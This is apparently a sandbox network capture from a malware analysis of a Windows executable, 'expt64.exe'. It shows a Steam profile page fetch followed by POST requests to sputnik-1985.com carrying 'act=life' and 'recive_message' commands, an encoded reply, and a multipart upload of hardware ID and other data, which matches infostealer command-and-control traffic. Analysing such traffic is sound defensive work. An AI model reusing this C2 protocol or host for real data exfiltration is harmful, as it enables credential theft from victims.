https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 10 Jan 2025 10:36:20 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=b84af25699299731d3a2833f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 10:36:20 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 10:36:20 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 10:36:20 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 10:36:20 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49716	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:21 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-10 10:36:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 10:36:21 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m4oo2qeafbkuoqps2u7am7bdts; expires=Tue, 06 May 2025 04:23:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPyIcUzTWQ%2B%2FH1ywMcuRRr%2BO8W3zeTvJyxoTiUM5EtccWZ3ft8ne%2FCwv%2FTPI0cUsLpvm8gYsveo5eH%2FBhCggJ5%2BAkhnEF3JncYh9DAmciaJsg4XduONliojho50M%2Bed9Yd6d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc068a5b6e7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=1995&rtt_var=790&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1349976&cwnd=218&unsent_bytes=0&cid=ffec16eb0ab2f96b&ts=473&x=0"
2025-01-10 10:36:21 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 10:36:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49717	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:22 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: sputnik-1985.com
2025-01-10 10:36:22 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 10:36:22 UTC	1117	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g4028b908ioe4dqrmmfdlrm24d; expires=Tue, 06 May 2025 04:23:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfS8wKR9TCakFmTRQOmemCieQYXHJN19uGekloNjRHncipBatxlt7N9o%2B4AcnbDLzugzWRfVfeX6l4sP8hxoBeYRbxUCUqlipTOxHjtTtMV4ARBAx8JpkK8qyFzN2ktwpz0x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0690ce3ede95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1666&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1606160&cwnd=242&unsent_bytes=0&cid=ab345d91c7cd9283&ts=481&x=0"
2025-01-10 10:36:22 UTC	252	IN	Data Raw: 34 33 30 63 0d 0a 4f 65 55 45 4c 34 74 31 30 44 55 48 77 4c 6a 78 69 53 55 57 31 41 68 74 42 59 68 64 46 68 61 5a 53 70 56 49 67 2f 43 72 54 36 42 43 78 33 49 4e 73 55 48 38 46 33 53 6c 6d 73 76 76 52 48 71 6e 62 55 45 6e 36 54 6b 30 4c 50 38 72 2b 54 76 6d 33 49 6b 35 7a 52 76 66 59 6b 37 6e 42 72 55 5a 4a 61 58 41 30 37 4e 2b 62 66 5a 74 41 79 65 79 66 33 4e 38 2b 79 76 35 4b 75 4b 62 78 44 2f 4d 57 6f 31 6f 53 4f 4d 51 73 31 46 6d 72 4e 57 55 37 45 42 33 76 6d 59 45 61 4f 41 77 4e 44 71 37 4c 2b 39 71 75 64 4c 6d 4b 74 52 59 71 47 56 63 34 46 65 74 47 58 7a 69 33 5a 2b 72 48 7a 53 31 62 51 39 70 37 6a 6c 39 66 76 45 69 38 53 76 6e 6d 74 73 6d 78 6c 47 4e 5a 6b 76 69 47 72 70 46 61 36 62 53 6e 2b 70 4b 64 2f 59 6b 54 32 44 79 66 79 77 30 71 42 Data Ascii: 430cOeUEL4t10DUHwLjxiSUW1AhtBYhdFhaZSpVIg/CrT6BCx3INsUH8F3SlmsvvRHqnbUEn6Tk0LP8r+Tvm3Ik5zRvfYk7nBrUZJaXA07N+bfZtAyeyf3N8+yv5KuKbxD/MWo1oSOMQs1FmrNWU7EB3vmYEaOAwNDq7L+9qudLmKtRYqGVc4FetGXzi3Z+rHzS1bQ9p7jl9fvEi8SvnmtsmxlGNZkviGrpFa6bSn+pKd/YkT2Dyfyw0qB
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 72 30 4f 2f 43 48 78 44 33 45 47 35 67 6f 56 4b 6b 51 76 68 63 39 34 74 4b 66 35 55 4a 33 75 57 30 4f 5a 2f 67 77 64 48 66 7a 49 50 4d 67 37 70 33 47 49 38 68 63 6a 32 39 4b 35 68 43 36 55 57 71 68 6d 74 32 72 51 47 7a 32 4d 6b 39 48 2b 6a 78 33 59 50 59 35 74 7a 57 76 69 34 6b 71 7a 68 76 66 4a 6b 76 6e 46 72 39 58 64 36 72 52 6d 4f 35 56 66 37 39 6e 41 6d 66 6e 4e 58 74 33 2b 79 2f 39 49 4f 36 59 7a 53 44 50 58 59 64 6d 44 61 64 58 74 55 38 6c 2b 70 71 77 37 6c 64 7a 75 6e 78 4e 58 61 6f 67 4f 6d 32 37 4c 2f 74 71 75 64 4c 42 4b 4d 46 59 6a 47 6c 4f 34 52 79 67 56 33 65 6b 31 35 62 35 51 58 47 34 59 41 78 31 34 44 46 79 64 2f 49 6a 2f 69 2f 6d 6c 6f 6c 6a 67 6c 79 66 4a 68 57 70 4e 72 39 63 61 61 6a 4e 6b 36 74 59 4f 71 38 71 43 47 75 71 5a 7a 52 77 2b Data Ascii: r0O/CHxD3EG5goVKkQvhc94tKf5UJ3uW0OZ/gwdHfzIPMg7p3GI8hcj29K5hC6UWqhmt2rQGz2Mk9H+jx3YPY5tzWvi4kqzhvfJkvnFr9Xd6rRmO5Vf79nAmfnNXt3+y/9IO6YzSDPXYdmDadXtU8l+pqw7ldzunxNXaogOm27L/tqudLBKMFYjGlO4RygV3ek15b5QXG4YAx14DFyd/Ij/i/mloljglyfJhWpNr9caajNk6tYOq8qCGuqZzRw+
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 68 6c 64 46 74 6d 68 75 32 63 55 61 72 49 72 46 5a 61 36 58 4d 30 2f 51 4a 62 66 5a 74 41 79 65 79 66 33 6c 38 2f 69 33 34 4b 2b 75 63 7a 43 66 4f 55 34 6c 6c 58 2b 59 54 73 6c 74 74 71 4e 65 64 37 30 39 39 76 57 45 4a 5a 2b 73 31 4e 44 71 37 4c 2b 39 71 75 64 4c 39 4b 73 35 57 69 43 52 34 36 68 6d 38 55 48 50 69 78 64 33 79 42 33 4f 36 4b 6c 63 6e 35 6a 5a 30 66 2f 45 73 39 79 33 73 6c 38 6f 71 77 56 61 41 62 45 50 75 45 37 35 65 61 4b 54 61 6c 4f 39 43 5a 72 4e 6a 41 32 75 71 63 54 52 7a 34 32 69 76 61 73 36 56 33 79 37 74 57 4a 5a 76 44 66 5a 5a 71 78 64 69 72 70 72 4c 71 30 42 78 76 6d 45 4a 62 2b 6f 74 63 58 72 77 4b 66 30 73 34 4a 2f 46 4b 38 4a 61 68 32 42 42 36 52 43 31 52 58 65 6e 33 49 48 68 42 7a 72 32 62 52 63 6e 73 6e 39 43 5a 4f 77 35 34 57 Data Ascii: hldFtmhu2cUarIrFZa6XM0/QJbfZtAyeyf3l8/i34K+uczCfOU4llX+YTslttqNed7099vWEJZ+s1NDq7L+9qudL9Ks5WiCR46hm8UHPixd3yB3O6Klcn5jZ0f/Es9y3sl8oqwVaAbEPuE75eaKTalO9CZrNjA2uqcTRz42ivas6V3y7tWJZvDfZZqxdirprLq0BxvmEJb+otcXrwKf0s4J/FK8Jah2BB6RC1RXen3IHhBzr2bRcnsn9CZOw54W
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 4a 63 70 55 69 47 4a 44 37 78 47 2f 55 6d 71 6f 79 4a 76 6c 53 6e 2b 35 59 52 31 6e 35 7a 74 34 63 50 4d 6a 2f 57 71 76 30 73 34 31 67 67 50 48 55 30 44 6d 46 37 46 42 4a 62 32 55 69 71 74 41 65 50 59 79 54 32 76 6b 50 33 74 34 39 79 50 2f 4b 2b 32 63 7a 69 6a 4c 55 34 39 30 54 4f 30 66 73 31 6c 71 6f 39 36 57 37 6b 4e 7a 73 6d 77 41 4a 36 52 2f 63 32 79 37 63 4c 63 46 78 71 65 4c 44 50 67 62 6d 43 68 55 71 52 43 2b 46 7a 33 69 31 70 44 6e 54 33 75 77 59 77 4e 74 34 7a 52 34 66 2f 38 6b 2f 69 2f 6e 6b 38 77 6f 77 31 2b 4c 62 45 76 71 46 4c 31 59 61 71 71 61 33 61 74 41 62 50 59 79 54 30 4c 39 4e 48 70 79 75 7a 65 35 4d 36 47 56 78 57 32 61 47 34 74 76 53 2b 38 53 76 6c 5a 6a 71 74 2b 62 37 30 5a 79 73 47 6b 41 59 2b 38 2b 65 33 44 33 4a 76 30 72 34 4a 37 Data Ascii: JcpUiGJD7xG/UmqoyJvlSn+5YR1n5zt4cPMj/Wqv0s41ggPHU0DmF7FBJb2UiqtAePYyT2vkP3t49yP/K+2czijLU490TO0fs1lqo96W7kNzsmwAJ6R/c2y7cLcFxqeLDPgbmChUqRC+Fz3i1pDnT3uwYwNt4zR4f/8k/i/nk8wow1+LbEvqFL1Yaqqa3atAbPYyT0L9NHpyuze5M6GVxW2aG4tvS+8SvlZjqt+b70ZysGkAY+8+e3D3Jv0r4J7
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 49 68 69 53 75 55 52 76 56 46 6b 70 39 43 66 37 45 4a 2f 75 57 5a 50 4b 61 6f 34 62 44 53 6a 61 4e 6b 68 38 6f 58 4b 49 38 6c 4e 6e 43 5a 53 70 77 37 79 55 47 6e 69 67 74 50 6f 54 48 2b 79 61 67 4e 6e 37 6a 4a 30 5a 76 51 76 38 43 50 71 67 4d 4d 71 78 56 43 50 62 55 4c 76 42 62 35 5a 64 36 66 49 67 61 73 4a 4e 4c 46 79 54 7a 2b 71 43 58 4e 6b 36 79 75 31 47 2f 65 52 33 79 62 50 56 38 64 35 41 2f 42 58 74 56 73 6c 2b 70 71 56 35 45 35 33 75 57 73 47 61 2b 63 36 66 58 48 36 4c 76 4d 67 36 35 4c 50 4b 38 4e 65 6a 57 56 4d 34 78 36 31 58 32 4b 68 79 4e 4f 6c 42 33 4f 75 4b 6c 63 6e 77 7a 68 6d 65 75 74 6f 36 47 54 34 30 73 34 68 67 67 50 48 59 6b 66 6d 45 37 56 62 59 36 66 63 6e 75 70 49 64 62 5a 6c 43 32 7a 6a 4f 58 56 35 2f 69 58 7a 4f 4f 75 5a 78 69 48 4c Data Ascii: IhiSuURvVFkp9Cf7EJ/uWZPKao4bDSjaNkh8oXKI8lNnCZSpw7yUGnigtPoTH+yagNn7jJ0ZvQv8CPqgMMqxVCPbULvBb5Zd6fIgasJNLFyTz+qCXNk6yu1G/eR3ybPV8d5A/BXtVsl+pqV5E53uWsGa+c6fXH6LvMg65LPK8NejWVM4x61X2KhyNOlB3OuKlcnwzhmeuto6GT40s4hggPHYkfmE7VbY6fcnupIdbZlC2zjOXV5/iXzOOuZxiHL
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 6a 6a 47 72 46 59 5a 72 44 62 6c 66 6c 48 65 62 78 34 42 57 7a 76 4d 6e 6c 35 2b 43 37 78 49 65 32 41 77 43 33 42 55 4d 63 6f 44 65 34 50 38 67 38 6c 67 63 32 46 34 55 42 34 6f 47 45 4f 5a 50 77 79 5a 44 53 31 61 4f 59 74 38 4e 4b 52 4f 39 4a 4d 67 48 6b 44 38 46 65 31 57 79 58 36 6d 70 58 69 51 58 4f 77 5a 42 31 69 37 44 42 37 66 66 49 73 2f 79 6e 68 6c 73 30 71 78 31 69 4c 62 55 72 71 47 4c 5a 65 61 36 76 56 30 36 55 48 63 36 34 71 56 79 66 4c 4a 48 64 34 39 6d 6a 6f 5a 50 6a 53 7a 69 47 43 41 38 64 71 51 2b 77 58 75 46 46 68 70 39 79 5a 37 6b 64 2f 74 57 55 4c 59 65 34 77 64 48 2f 79 4b 66 45 76 36 35 6e 50 49 4d 46 64 67 53 59 44 71 52 43 71 46 7a 33 69 2b 6f 6a 6d 53 33 50 32 64 55 46 2b 71 6a 68 34 4e 4b 4e 6f 2f 43 62 6c 6c 63 6b 67 77 56 4f 43 59 Data Ascii: jjGrFYZrDblflHebx4BWzvMnl5+C7xIe2AwC3BUMcoDe4P8g8lgc2F4UB4oGEOZPwyZDS1aOYt8NKRO9JMgHkD8Fe1WyX6mpXiQXOwZB1i7DB7ffIs/ynhls0qx1iLbUrqGLZea6vV06UHc64qVyfLJHd49mjoZPjSziGCA8dqQ+wXuFFhp9yZ7kd/tWULYe4wdH/yKfEv65nPIMFdgSYDqRCqFz3i+ojmS3P2dUF+qjh4NKNo/CbllckgwVOCY
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 6b 57 6e 57 6c 6d 71 79 6c 42 32 7a 32 4d 6b 39 53 36 54 46 36 63 2b 30 35 75 67 33 33 6d 4d 34 39 78 55 79 49 4a 67 4f 70 45 66 49 50 4e 75 79 61 6c 2f 6f 48 4c 4f 59 34 56 44 4b 35 61 43 51 6d 35 47 62 75 61 76 66 53 6b 58 2b 4d 47 35 55 6d 46 61 6c 51 73 55 56 33 70 4e 6d 46 36 41 42 4b 69 45 30 56 61 75 77 6f 5a 55 72 46 4c 2b 30 6e 35 34 58 59 59 64 64 59 69 57 68 4b 2f 31 66 38 46 32 72 69 67 71 71 72 44 7a 53 4a 4a 45 39 2f 71 6d 63 30 51 66 67 6d 2b 53 33 33 67 34 51 4b 32 46 61 42 63 56 79 70 57 66 4a 52 4a 66 71 4b 33 61 74 44 5a 66 59 79 58 7a 57 78 61 69 63 6a 71 33 72 6f 5a 50 6a 53 33 32 32 61 43 63 6b 6d 58 36 6c 50 38 68 42 6d 73 4d 69 56 36 46 46 33 38 56 51 78 53 65 30 35 63 58 50 72 61 74 6b 68 39 5a 57 4a 59 34 4a 55 78 7a 35 30 71 56 Data Ascii: kWnWlmqylB2z2Mk9S6TF6c+05ug33mM49xUyIJgOpEfIPNuyal/oHLOY4VDK5aCQm5GbuavfSkX+MG5UmFalQsUV3pNmF6ABKiE0VauwoZUrFL+0n54XYYddYiWhK/1f8F2rigqqrDzSJJE9/qmc0Qfgm+S33g4QK2FaBcVypWfJRJfqK3atDZfYyXzWxaicjq3roZPjS322aCckmX6lP8hBmsMiV6FF38VQxSe05cXPratkh9ZWJY4JUxz50qV
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 34 6f 4c 42 70 51 64 77 70 79 70 58 4e 37 68 6b 49 53 65 73 65 4b 55 31 72 34 75 4a 4f 34 49 44 31 53 67 4e 2b 31 66 71 46 79 4b 68 79 49 48 74 52 47 4b 31 4c 54 46 5a 7a 54 46 7a 64 65 30 34 34 43 57 75 76 50 38 4d 2f 47 57 53 5a 55 50 6e 45 4b 52 47 4a 65 79 61 6e 4b 73 66 54 66 59 69 54 31 69 6b 66 32 77 30 6f 32 6a 43 4b 65 2b 63 7a 6a 76 54 46 71 42 6f 53 75 67 42 6f 6b 42 71 37 66 53 6c 79 67 63 36 39 6d 78 50 50 37 68 78 4e 48 44 71 61 4b 39 36 73 38 6d 63 66 70 55 4c 31 58 6b 44 38 46 65 6b 46 7a 33 77 6c 4e 50 35 42 79 7a 32 4c 51 78 31 2b 44 6c 33 59 76 68 76 79 52 54 47 6e 4d 34 73 31 45 75 4b 61 6d 7a 71 42 72 68 70 57 37 66 5a 6e 65 56 41 59 71 63 71 51 53 66 6c 66 79 78 4e 75 32 43 33 46 61 2f 53 30 57 32 61 47 37 4a 6c 51 2b 63 51 70 45 59 Data Ascii: 4oLBpQdwpypXN7hkISeseKU1r4uJO4ID1SgN+1fqFyKhyIHtRGK1LTFZzTFzde044CWuvP8M/GWSZUPnEKRGJeyanKsfTfYiT1ikf2w0o2jCKe+czjvTFqBoSugBokBq7fSlygc69mxPP7hxNHDqaK96s8mcfpUL1XkD8FekFz3wlNP5Byz2LQx1+Dl3YvhvyRTGnM4s1EuKamzqBrhpW7fZneVAYqcqQSflfyxNu2C3Fa/S0W2aG7JlQ+cQpEY
2025-01-10 10:36:22 UTC	1369	IN	Data Raw: 4e 56 35 57 61 52 74 48 32 53 6f 45 33 4e 35 39 78 62 4a 48 66 43 56 32 57 2f 6b 57 4a 46 6c 44 61 64 58 71 68 63 39 34 76 65 42 37 46 64 33 39 45 59 49 61 75 5a 2f 61 7a 72 69 61 4f 46 71 75 63 47 48 62 64 41 62 33 79 59 4b 36 67 57 67 55 57 61 30 32 64 54 56 65 56 6d 6b 62 52 39 6b 71 41 35 35 63 4f 30 39 39 44 72 6d 72 50 63 41 30 46 79 58 5a 51 2f 4d 4c 66 42 6d 63 36 48 61 6e 65 77 48 4f 76 5a 79 54 7a 2b 71 45 6d 5a 7a 36 79 75 31 44 39 76 51 2b 44 76 42 57 34 6c 68 44 61 64 58 76 68 63 39 34 74 65 42 37 46 64 33 2b 6d 30 56 59 4b 6f 67 4f 6d 32 37 50 72 64 79 73 74 79 4a 50 34 49 44 78 79 46 44 35 42 61 78 57 57 61 77 79 4a 58 6f 55 58 66 78 56 44 46 49 34 54 35 6b 65 65 6f 6c 38 7a 7a 66 72 4f 34 72 78 31 79 35 57 48 72 34 45 4b 49 56 51 36 48 4d Data Ascii: NV5WaRtH2SoE3N59xbJHfCV2W/kWJFlDadXqhc94veB7Fd39EYIauZ/azriaOFqucGHbdAb3yYK6gWgUWa02dTVeVmkbR9kqA55cO099DrmrPcA0FyXZQ/MLfBmc6HanewHOvZyTz+qEmZz6yu1D9vQ+DvBW4lhDadXvhc94teB7Fd3+m0VYKogOm27PrdystyJP4IDxyFD5BaxWWawyJXoUXfxVDFI4T5keeol8zzfrO4rx1y5WHr4EKIVQ6HM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49719	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:23 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WAVL3SHF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12784 Host: sputnik-1985.com
2025-01-10 10:36:23 UTC	12784	OUT	Data Raw: 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --WAVL3SHFContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--WAVL3SHFContent-Disposition: form-data; name="pid"2--WAVL3SHFContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--WAVL3SHFContent-D
2025-01-10 10:36:24 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=97c3ivlu2i8ft3rralndkh989m; expires=Tue, 06 May 2025 04:23:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAACk%2FBBYTBpH9M4ONz%2BK9slx8aWcKqpDREsYOJ%2BnrGYT6mFgkh2VvaaOGEtopRVbeeijxdmFOsNuWzZZnI1zMedgoCDV6ypulWjFywJe0MtUFmubJNFLcR6Kt%2B%2FAT54gmx4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06997ba77c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1978&rtt_var=763&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13714&delivery_rate=1414043&cwnd=218&unsent_bytes=0&cid=553cb9fd828e13c0&ts=691&x=0"
